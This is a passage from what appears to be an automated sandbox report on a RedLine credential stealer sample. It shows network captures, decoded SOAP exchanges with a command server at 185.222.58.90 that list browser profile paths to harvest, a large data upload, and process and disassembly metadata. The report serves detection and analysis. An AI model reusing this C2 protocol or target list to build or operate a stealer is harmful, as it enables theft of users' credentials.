                                                                Jul 11, 2022 10:31:43.988493919 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:43.988604069 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:43.988636971 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:43.988802910 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:43.988835096 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:43.988929033 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:43.989042044 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:43.989159107 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:43.989289045 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:43.989408970 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:43.989480972 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:44.003473043 CEST4983717910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:44.004951000 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:44.005495071 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:44.026563883 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:44.026695967 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:44.026839018 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:44.027250051 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:44.027430058 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:44.027631044 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:44.052056074 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:44.155589104 CEST4983717910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:45.614547968 CEST4983717910192.168.2.5185.222.58.90

                                                                UDP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Jul 11, 2022 10:31:21.619807005 CEST5393453192.168.2.58.8.8.8
                                                                Jul 11, 2022 10:31:21.657536983 CEST6371253192.168.2.58.8.8.8

                                                                DNS Queries

                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                Jul 11, 2022 10:31:21.619807005 CEST192.168.2.58.8.8.80x138aStandard query (0)api.ip.sbA (IP address)IN (0x0001)
                                                                Jul 11, 2022 10:31:21.657536983 CEST192.168.2.58.8.8.80xb6fStandard query (0)api.ip.sbA (IP address)IN (0x0001)

                                                                DNS Answers

                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                Jul 11, 2022 10:31:21.642599106 CEST8.8.8.8192.168.2.50x138aNo error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                Jul 11, 2022 10:31:21.681529045 CEST8.8.8.8192.168.2.50xb6fNo error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)

                                                                HTTP Request Dependency Graph

                                                                • 185.222.58.90:17910

                                                                HTTP Packets

                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                0192.168.2.549761185.222.58.9017910C:\Users\user\Desktop\DBAcglWJwi.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Jul 11, 2022 10:31:12.406061888 CEST829OUTPOST / HTTP/1.1
                                                                Content-Type: text/xml; charset=utf-8
                                                                SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                                                Host: 185.222.58.90:17910
                                                                Content-Length: 137
                                                                Expect: 100-continue
                                                                Accept-Encoding: gzip, deflate
                                                                Connection: Keep-Alive
                                                                Jul 11, 2022 10:31:12.432923079 CEST829INHTTP/1.1 100 Continue
                                                                Jul 11, 2022 10:31:12.471749067 CEST830INHTTP/1.1 200 OK
                                                                Content-Length: 212
                                                                Content-Type: text/xml; charset=utf-8
                                                                Server: Microsoft-HTTPAPI/2.0
                                                                Date: Mon, 11 Jul 2022 08:31:12 GMT
                                                                Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                                                                Jul 11, 2022 10:31:20.871911049 CEST1145OUTPOST / HTTP/1.1
                                                                Content-Type: text/xml; charset=utf-8
                                                                SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                                                                Host: 185.222.58.90:17910
                                                                Content-Length: 144
                                                                Expect: 100-continue
                                                                Accept-Encoding: gzip, deflate
                                                                Jul 11, 2022 10:31:20.896469116 CEST1145INHTTP/1.1 100 Continue
                                                                Jul 11, 2022 10:31:20.940469980 CEST1147INHTTP/1.1 200 OK
                                                                Content-Length: 4793
                                                                Content-Type: text/xml; charset=utf-8
                                                                Server: Microsoft-HTTPAPI/2.0
                                                                Date: Mon, 11 Jul 2022 08:31:20 GMT
                                                                Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 3e 3c 62 3a 73 74 72 69 6e 67 3e 31 30 33 2e 31 31 33 2e 31 34 31 2e 32 35 32 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 2f 61 3a 42 6c 6f 63 6b 65 64 49 50 3e 3c 61 3a 4f 62 6a 65 63 74 34 3e 74 72 75 65 3c 2f 61 3a 4f 62 6a 65 63 74 34 3e 3c 61 3a 4f 62 6a 65 63 74 36 3e 66 61 6c 73 65 3c 2f 61 3a 4f 62 6a 65 63 74 36 3e 3c 61 3a 53 63 61 6e 42 72 6f 77 73 65 72 73 3e 74 72 75 65 3c 2f 61 3a 53 63 61 6e 42 72 6f 77 73 65 72 73 3e 3c 61 3a 53 63 61 6e 43 68 72 6f 6d 65 42 72 6f 77 73 65 72 73 50 61 74 68 73 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 42 61 74 74 6c 65 2e 6e 65 74 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 43 68 72 6f 6d 69 75 6d 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 47 6f 6f 67 6c 65 5c 43 68 72 6f 6d 65 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 47 6f 6f 67 6c 65 28 78 38 36 29 5c 43 68 72 6f 6d 65 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c 4f 70 65 72 61 20 53 6f 66 74 77 61 72 65 5c 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 4d 61 70 6c 65 53 74 75 64 69 6f 5c 43 68 72 6f 6d 65 50 6c 75 73 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 49 72 69 64 69 75 6d 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 37 53 74 61 72 5c 37 53 74 61 72 5c 55 73 65 72 20 44 61 74 61 3c 2f 62
                                                                Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>103.113.141.252</b:string></a:BlockedIP><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Battle.net</b:string><b:string>%USERPROFILE%\AppData\Local\Chromium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google(x86)\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Roaming\Opera Software\</b:string><b:string>%USERPROFILE%\AppData\Local\MapleStudio\ChromePlus\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Iridium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\7Star\7Star\User Data</b


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                1192.168.2.549837185.222.58.9017910C:\Users\user\Desktop\DBAcglWJwi.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Jul 11, 2022 10:31:42.799798965 CEST2313OUTPOST / HTTP/1.1
                                                                Content-Type: text/xml; charset=utf-8
                                                                SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                                                                Host: 185.222.58.90:17910
                                                                Content-Length: 1146787
                                                                Expect: 100-continue
                                                                Accept-Encoding: gzip, deflate
                                                                Jul 11, 2022 10:31:42.823388100 CEST2320INHTTP/1.1 100 Continue
                                                                Jul 11, 2022 10:31:43.099879026 CEST3615INHTTP/1.1 200 OK
                                                                Content-Length: 147
                                                                Content-Type: text/xml; charset=utf-8
                                                                Server: Microsoft-HTTPAPI/2.0
                                                                Date: Mon, 11 Jul 2022 08:31:42 GMT
                                                                Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
                                                                Jul 11, 2022 10:31:43.104670048 CEST3615OUTPOST / HTTP/1.1
                                                                Content-Type: text/xml; charset=utf-8
                                                                SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                                                Host: 185.222.58.90:17910
                                                                Content-Length: 1146779
                                                                Expect: 100-continue
                                                                Accept-Encoding: gzip, deflate
                                                                Jul 11, 2022 10:31:43.127749920 CEST3615INHTTP/1.1 100 Continue
                                                                Jul 11, 2022 10:31:44.052056074 CEST5314INHTTP/1.1 200 OK
                                                                Content-Length: 261
                                                                Content-Type: text/xml; charset=utf-8
                                                                Server: Microsoft-HTTPAPI/2.0
                                                                Date: Mon, 11 Jul 2022 08:31:44 GMT
                                                                Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


                                                                Statistics

                                                                CPU Usage

                                                                Click to jump to process

                                                                Memory Usage

                                                                Click to jump to process

                                                                High Level Behavior Distribution

                                                                Click to dive into process behavior distribution

                                                                Behavior

                                                                Click to jump to process

                                                                System Behavior

                                                                General

                                                                Target ID:0
                                                                Start time:10:30:47
                                                                Start date:11/07/2022
                                                                Path:C:\Users\user\Desktop\DBAcglWJwi.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\DBAcglWJwi.exe"
                                                                Imagebase:0x360000
                                                                File size:97792 bytes
                                                                MD5 hash:0B17057228D36C548C8C90297A81BF75
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:.Net C# or VB.NET
                                                                Yara matches:
                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.563277985.0000000000362000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.563277985.0000000000362000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.566530669.00000000026EF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000000.439615387.0000000000362000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.439615387.0000000000362000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                Reputation:low

                                                                General

                                                                Target ID:1
                                                                Start time:10:30:48
                                                                Start date:11/07/2022
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff77f440000
                                                                File size:625664 bytes
                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                Disassembly

                                                                Reset < >

                                                                  Execution Graph

                                                                  Execution Coverage:14.3%
                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:16
                                                                  Total number of Limit Nodes:0
                                                                  execution_graph 12282 cd0481 12286 cd04d8 12282->12286 12291 cd04d7 12282->12291 12283 cd0489 12287 cd04fa 12286->12287 12296 cd08e8 12287->12296 12300 cd08e7 12287->12300 12288 cd053e 12288->12283 12292 cd04fa 12291->12292 12294 cd08e8 GetConsoleWindow 12292->12294 12295 cd08e7 GetConsoleWindow 12292->12295 12293 cd053e 12293->12283 12294->12293 12295->12293 12297 cd0926 GetConsoleWindow 12296->12297 12299 cd0956 12297->12299 12299->12288 12301 cd0926 GetConsoleWindow 12300->12301 12303 cd0956 12301->12303 12303->12288

                                                                  Executed Functions

                                                                  Function 00CDDE10 Relevance: .9, Instructions: 932COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 964 cdde10-cdde31 966 cdde75-cdde7c 964->966 967 cdde33-cdde39 964->967 968 cdde3f-cdde59 967->968 969 cde00b-cde021 967->969 975 cdde7d-cdde8c 968->975 976 cdde5b-cdde6a 968->976 972 cde023-cde064 969->972 973 cddfe2-cde004 969->973 979 cde06d-cde078 972->979 980 cde066-cde068 972->980 973->969 986 cdde70-cdde73 975->986 987 cdde8e-cdde9d 975->987 985 cddf55-cddf5e 976->985 976->986 988 cde07e-cde08f 979->988 989 cde999-cdea49 979->989 983 cde98f-cde996 980->983 990 cddf68-cddfde 985->990 991 cddf60-cddf66 985->991 986->966 986->967 987->986 996 cdde9f-cddea8 987->996 998 cde091-cde0a0 988->998 999 cde0a2 988->999 1054 cdea50-cdeb0e 989->1054 990->973 991->990 1000 cddeaa-cddeb0 996->1000 1001 cddeb2-cddf4e 996->1001 1004 cde0a4-cde0d5 998->1004 999->1004 1000->1001 1001->985 1016 cde0d7-cde0eb call cdcf58 1004->1016 1017 cde0f3-cde11e 1004->1017 1016->1017 1024 cde13c-cde15e 1017->1024 1025 cde120-cde134 call cdcf58 1017->1025 1038 cde3b5-cde3bf 1024->1038 1039 cde164-cde18a 1024->1039 1025->1024 1042 cde3dd-cde3f5 1038->1042 1043 cde3c1-cde3d5 call cdcf58 1038->1043 1058 cde190-cde19d 1039->1058 1059 cde3a3-cde3af 1039->1059 1239 cde3f7 call cdf660 1042->1239 1240 cde3f7 call cdf652 1042->1240 1043->1042 1080 cdeb15-cdebcc 1054->1080 1055 cde3fd-cde45a 1089 cde46d-cde4d2 call cdc3b8 1055->1089 1090 cde45c-cde465 1055->1090 1058->1054 1067 cde1a3-cde1a7 1058->1067 1059->1038 1059->1039 1070 cde1a9-cde1b5 1067->1070 1071 cde1bb-cde1c1 1067->1071 1070->1071 1070->1080 1073 cde1d5-cde220 1071->1073 1074 cde1c3-cde1cf 1071->1074 1100 cde299-cde29d 1073->1100 1101 cde222-cde244 1073->1101 1074->1073 1081 cdebd3-cdec8a 1074->1081 1080->1081 1138 cdec91-cdede3 1081->1138 1130 cde4e4-cde4f0 1089->1130 1131 cde4d4-cde4de 1089->1131 1090->1089 1102 cde29f-cde2c1 1100->1102 1103 cde316-cde34e 1100->1103 1124 cde26d-cde28a 1101->1124 1125 cde246-cde26b 1101->1125 1132 cde2ea-cde307 1102->1132 1133 cde2c3-cde2e8 1102->1133 1157 cde377-cde394 1103->1157 1158 cde350-cde375 1103->1158 1172 cde292-cde294 1124->1172 1125->1172 1139 cde4f6-cde4ff 1130->1139 1140 cde5b1-cde5fa call cdc3b8 1130->1140 1131->1130 1131->1138 1182 cde30f-cde311 1132->1182 1133->1182 1180 cdedea-cdee3b 1138->1180 1145 cde505-cde50b 1139->1145 1146 cdee42-cdee50 1139->1146 1211 cde5fc-cde622 1140->1211 1212 cde624-cde640 1140->1212 1151 cde50d-cde513 1145->1151 1152 cde523-cde556 1145->1152 1169 cdedd5-cdede3 1146->1169 1170 cdee52-cdee6c call cdc280 1146->1170 1163 cde515 1151->1163 1164 cde517-cde521 1151->1164 1174 cde558-cde56c call cdcf58 1152->1174 1175 cde574-cde5ab 1152->1175 1205 cde39c-cde39e 1157->1205 1158->1205 1163->1152 1164->1152 1169->1180 1195 cdee6e-cdee70 1170->1195 1196 cdee71-cdee80 1170->1196 1172->983 1174->1175 1175->1139 1175->1140 1180->1146 1182->983 1206 cdee8d-cdee91 1196->1206 1207 cdee82-cdee8c 1196->1207 1205->983 1211->1212 1218 cde64e 1212->1218 1219 cde642 1212->1219 1218->983 1219->1218 1239->1055 1240->1055
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.565574106.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cd0000_DBAcglWJwi.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f851fd214eef993668107b260651987757a4e4e96d0e12fe4c778156e1e63e28
                                                                  • Instruction ID: 1cfba31fc36b7115df994dca4409c37deeaea38735df2a1907517651ac4715e4
                                                                  • Opcode Fuzzy Hash: f851fd214eef993668107b260651987757a4e4e96d0e12fe4c778156e1e63e28
                                                                  • Instruction Fuzzy Hash: 7C821B74B002189FCB54EF64D898BADB7B2FF88304F1084AAE50A9B3A5DB749D45CF51
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00CD08E8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 956 cd08e8-cd0954 GetConsoleWindow 959 cd095d-cd0982 956->959 960 cd0956-cd095c 956->960 960->959
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.565574106.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cd0000_DBAcglWJwi.jbxd
                                                                  Similarity
                                                                  • API ID: ConsoleWindow
                                                                  • String ID:
                                                                  • API String ID: 2863861424-0
                                                                  • Opcode ID: 7ee39ce3d24f52ddc9bdbf9c2012844186c9f6067adacf8e4d8730b024e85059
                                                                  • Instruction ID: c11dd75f26778b9b98789e45c8056a1bede085f447e2822dcadcec12abb2233f
                                                                  • Opcode Fuzzy Hash: 7ee39ce3d24f52ddc9bdbf9c2012844186c9f6067adacf8e4d8730b024e85059
                                                                  • Instruction Fuzzy Hash: 041136B1D002098FDB10DFAAC4447DFFBF9AF48324F24882AC159A7240C774A944CF91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00CD08E7 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 948 cd08e7-cd0954 GetConsoleWindow 951 cd095d-cd0982 948->951 952 cd0956-cd095c 948->952 952->951
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.565574106.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cd0000_DBAcglWJwi.jbxd
                                                                  Similarity
                                                                  • API ID: ConsoleWindow
                                                                  • String ID:
                                                                  • API String ID: 2863861424-0
                                                                  • Opcode ID: 44488b24bad31f62d9d9195161ba59a1d8b6ac6dd230619275c84abf24f5303f
                                                                  • Instruction ID: dbc15bb4a79c289c64337f3db29dc9e7e2604c48bebed24c9e928764622f3f58
                                                                  • Opcode Fuzzy Hash: 44488b24bad31f62d9d9195161ba59a1d8b6ac6dd230619275c84abf24f5303f
                                                                  • Instruction Fuzzy Hash: 0B1125B1D002498FDB10DFAAD4547EFBBF5AF88324F24882AC159A7240C7749944CF91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00A2D054 Relevance: .1, Instructions: 77COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.564190611.0000000000A2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A2D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_a2d000_DBAcglWJwi.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8a2f5c4e8022fe715e44052aaa78374ab037d404695e1d0cad3353b096916aa6
                                                                  • Instruction ID: 3d5acdbfdf8524d610c51a9937743a4a7c94e08d5df98ca58e58df4192b73eae
                                                                  • Opcode Fuzzy Hash: 8a2f5c4e8022fe715e44052aaa78374ab037d404695e1d0cad3353b096916aa6
                                                                  • Instruction Fuzzy Hash: A021F4B2504240EFCB15DF54E8C0B66BBA6FB88314F248679E9090B656C336D826CBA1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00A2D5F4 Relevance: .1, Instructions: 75COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.564190611.0000000000A2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A2D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_a2d000_DBAcglWJwi.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: bd12cee3c355cae7d9f7d308abbf045204f8fcbec45e722953a7eb1cc7e4e90a
                                                                  • Instruction ID: e7e5e45036fcdcabc1dcc949bdd764197b4bcaac8751630504486d6935f95ab5
                                                                  • Opcode Fuzzy Hash: bd12cee3c355cae7d9f7d308abbf045204f8fcbec45e722953a7eb1cc7e4e90a
                                                                  • Instruction Fuzzy Hash: AA2103B2514244DFDB04CF58E8C0B66BF66FB88324F248979E8090B247C336D85ACAA1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00C3D4A4 Relevance: .1, Instructions: 72COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
